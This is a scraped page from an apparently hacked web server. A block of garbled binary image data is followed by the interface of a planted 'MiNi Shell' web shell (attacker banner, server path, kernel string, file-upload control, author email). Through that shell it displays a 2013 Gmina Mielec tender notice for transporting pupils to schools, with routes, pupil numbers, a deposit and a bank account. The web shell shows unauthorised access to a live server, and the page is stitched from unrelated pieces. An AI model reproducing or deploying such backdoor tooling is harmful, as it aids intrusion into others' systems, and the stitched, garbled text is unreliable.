JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130725/294190-N-2013.html

<p class="kh_header"><b>Mielec: Dowóz uczniów do szkół podstawowych i gimnazjum z terenu Gminy Mielec w roku szkolnym 2013/2014wraz z odwozem.</b><br>
<b>Numer ogłoszenia: 294190 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mielec , ul. Jadernych 7, 39-300 Mielec, woj. podkarpackie, tel. 017 7730590 w. 124, faks 017 7730590.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.mielec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół podstawowych i gimnazjum z terenu Gminy Mielec w roku szkolnym 2013/2014wraz z odwozem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na dowozie uczniów do szkół podstawowych i gimnazjum z terenu Gminy Mielec w roku szkolnym 2013/2014         wraz  z odwozem   zgodnie z opisem tras załączonym poniżej. 
-Przez dowóz uczniów rozumie się: dowóz uczniów z wszystkich miejscowości położonych na terenie Gminy Mielec do szkół podstawowych i gimnazjów z miejsca zamieszkania i odwożenie uczniów do miejsca zamieszkania.
-Dowóz uczniów musi nastąpić w godzinach, ustalonych z Dyrektorami Szkół .Przewiduje się, że usługi przewozowe realizowane będą w godzinach 7:10 do 15:10 zależnie od ustalonego w danej szkole planu lekcji. Szczegółowy harmonogram godzin przyjazdów i odjazdów autobusów przewoźnik otrzyma na 7 dni przed planowanym rozpoczęciem zamówienia od dyrektorów szkół
-Wysiadanie i wsiadanie uczniów musi odbywać się w miejscach bezpiecznych do tego wyznaczonych  i zgodnych z przepisami ruchu drogowego.  
-Autobusy przeznaczone do przewozu muszą odpowiadać przepisom ustawy Prawo o ruchu drogowym.
Zamawiający zastrzega sobie możliwość:	
a/   zmiany liczby dowożonych uczniów 
b/ zmiany czasu dowozu i odwozu w zależności od rozkładu zajęć lekcyjnych.
-Zamawiający wymaga aby przewóz odbywał się sprawnymi technicznie autobusami służącymi do przewozu uczniów. W okresach jesienno - zimowych pojazdy dowożące uczniów muszą być ogrzewane .
W ofercie należy podać cenę za jeden dzień przewozu (uwzględniając dowóz i odwóz na wszystkich trasach podanych w niniejszej SIWZ) Wymagania szczegółowe związane  z przedmiotem zamówienia:
-	wykonawcę obowiązuje najwyższa staranność w wykonaniu przedmiotu zamówienia
Wykonawca jest odpowiedzialny za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia 
-	 autobusy muszą być dostosowane do przewozu uczniów, muszą zapewniać miejsca siedzące, autobusy muszą być odpowiednio oznakowane (z przodu autobusów, mikrobusów należy umieścić tablicę koloru żółtego z czarnym napisem Autobus szkolny, znak STOP oraz znak Uwaga Dzieci wyraźnie widoczny podczas wsiadania i wysiadania uczniów), posiadać odpowiednią ilość miejsc,

Zaleca się oferentom przeprowadzenie wizji lokalnej proponowanych tras przewozu,
w celu uzyskania informacji, które mogą być konieczne dla prawidłowego przygotowania oferty oraz doboru odpowiedniego środka transportu do wykonania zadania na poszczególnych trasach.

Ustala się następujące trasy przewozowe uczniów:
Trasa I
Wola Mielecka - Goleszów - Boża Wola - Książnice -Wola Mielecka (dowóz i odwóz )
Wyjazd ze szkoły z opiekunem w Woli Mieleckiej 7.20
Przystanek początkowy Goleszów - wyjazd 7.30.
Dowóz obejmuje uczniów z Goleszowa, Bożej Woli, Książnic i części Podleszan do
skrzyżowania.	
Łączna liczba uczniów: 60 
Odwoź - wyjazd z miejscowości Wola Mielecka - szkoła w następujących godzinach:
14.30 - trzy raz w tygodniu
13.30 - dwa razy w tygodniu
Trasa II
Wola Mielecka -Rydzów - Wola Mielecka ( Tarnowiec) - Wólka Książnicka - Podleszany - Wola Mielecka (dowóz i odwoź)
Wyjazd ze szkoły z opiekunem w Woli Mieleckiej 7.10.
Przystanek początkowy Rydzów szkoła - wyjazd 7.30.
Dowóz obejmuje uczniów z Rydzowa, części Podleszan od strony Wola Mielecka -(Tarnowiec) oraz Wólkę Książnicką i część Podleszan od szkoły
Łączna liczba uczniów: 38+25(Podleszany)= 63
Odwóz - wyjazd z miejscowości Wola Mielecka - szkoła w następujących godzinach: 
14.30 - trzy raz w tygodniu 
13.30 - dwa razy w tygodniu
 Powrót do szkoły - odwóz opiekuna

Trasa III
Wola Mielecka -Rzędzianowice (Olszyny) - Wola Pławska - Rzedzianowice-
Wola Mielecka (dowóz i odwóz)
Wyjazd ze szkoły z opiekunem w Woli Mieleckiej 7.10.
Przystanek początkowy Rzedzianowice (Olszyny) - wyjazd 7.20.
Dowóz obejmuje uczniów Woli Pławskiej, Rzędzianowic i części Woli Mieleckiej.
Łączna liczba uczniów: 80
Odwóz - wyjazd z miejscowości Wola Mielecka - szkoła w następujących godzinach:
14.30 - trzy raz w tygodniu

Dwa razy w tygodniu o godz. 15.30 dodatkowy odwoź uczniów z klasy sportowej                   w liczbie 19  uczniów uczęszczających na zajęcia dodatkowe( dotyczy tras I,II,III)
13.30 - dwa razy w tygodniu. Powrót do szkoły - odwóz opiekuna 

Trasa IV
Wyjazd Wola Mielecka godz.7.20 .Dowóz na trasie Wola Mielecka do SP Rzedzianowice obejmuje 17 uczniów .
Następnie dowóz i odwóz na trasie SP Rzędzianowice - Olszyny II godz. 7.28,Wola Pławska do 
SP Rzędzianowice godz.7.45 - 62 uczniów. 
Odwóz opiekuna pod szkołę .
Godziny odwozu ustalone zostaną na 7 dni przed rozpoczęciem dowozu .

  Trasa V
Wyjazd z miejscowości Złotniki z opiekunem 7.10,Chrząstów, Brzyście , Chrząstów , Chorzelów godz. 7.50 - 66 uczniów 
Odwóz w trzech turach:
 o godz.13.35- 5 razy w tygodniu, 
o godz.14.30 - 5 razy w tygodniu
o godz.15.25 - 3 razy w tygodniu
 ( technicznie  możliwy odwóz  jednym autokarem, który wraca po każdym kursie po następnych uczniów bez konieczności odwozu opiekuna) ilość dzieci i godziny zostaną ustalone na siedem dni przed rozpoczęciem dowozu)

Trasa VI
Wyjazd z miejscowości Szydłowiec z opiekunem 7.10,Wola Chorzelowska, Trześń, Ławnica, Chorzelów godz. 7.50 - 67 uczniów +24 uczniów dojeżdżających do SP Trześń
Odwóz w trzech turach:
o godz.13.35- 5 razy w tygodniu, 
o godz.14.30 - 5 razy w tygodniu
o godz.15.25 - 3 razy w tygodniu

( technicznie  możliwy odwóz  jednym autokarem, oprócz sezonu zimowego  który wraca po każdym kursie po następnych uczniów)  ilość dzieci i godziny zostaną ustalone na siedem dni przed rozpoczęciem dowozu)

 Trasa VII
Wyjazd z miejscowości Grochowe z opiekunem 7.30 , Trześń, Smyków,  Chorzelów 7.50
- 60 uczniów +ok.15 uczniów dojeżdżających do SP Trzesń

Odwóz na trasie połączonej z VI i VII  w następujący sposób Chorzelów, Smyków, Ławnica Trześń, Grochowe,  Trześń, Wola Chorzelowska, Szydłowiec   w trzech turach:
o godz.13.35- 5 razy w tygodniu, 
o godz.14.30 - 5 razy w tygodniu
o godz.15.25 - 3 razy w tygodniu

 (technicznie  możliwy odwóz  jednym autokarem, który wraca po każdym kursie po następnych uczniów  -odwóz opiekuna po ostatnim kursie  do najbliższego przystanku na SSE  w Mielcu.
Zamawiający zastrzega sobie prawo zmiany tras i godzin przejazdów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:
6 500,00 złotych (słownie: sześć tysięcy pięćset zł 00/100)
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
-	w pieniądzu,
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
-	w gwarancjach ubezpieczeniowych, 
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
83 8642 1168 2016 6808 8415 0003
Wadium wnoszone w innej formie niż w pieniądzu (oryginał dokumentu) należy zdeponować w pok. nr.18 Urzędu Gminy  Mielec ul. Jadernych 7 ,39-300 Mielec 
2.Wykonawca, który nie wniesie wadium na okres związania ofertą zostanie przez Zamawiającego wykluczony z postępowania.
3.Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedno zadanie na przewóz dzieci w okresie 1 roku szkolnego  z należytą starannością z podaniem ich wartości przedmiotu, daty wykonania i odbiorców wraz z dokumentami potwierdzającymi, że zlecenie zostało wykonane bez zastrzeżeń i prawidłowo ukończone. - wartość zamówień brutto nie mniejsza niż 220 000,00 zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca dysponuje taborem przeznaczonym do realizacji zamówienia spełniający właściwe wymagania techniczne w ruchu drogowym   Wymagane jest  dysponowanie minimum 8 autobusami do przewożenia osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca dysponuje osobami posiadającymi uprawnienia wymagane prawem do kierowania pojazdami wyszczególnionymi w ofercie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  /POLISA  OC na kwotę minimum kwoty ceny oferty   /</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień treści zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy w przypadku wystąpienia następujących okoliczności .
Zmiana terminu przewidzianego na zakończenie usługi
Wstrzymanie usług przez Zamawiającego
Zmiana tras przejazdu
Pozostałe rodzaje zmian spowodowane następującymi okolicznościami 
Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ
Zmiana obowiązującej stawki VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina.mielec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędzie Gminy Mielec ul. Jadernych 7,39-300 Mielec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2013 godzina 10:00, miejsce: Sekretariat Urzędu Gminy Mielec ul. Jadernych 7, 39-300 Mielec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com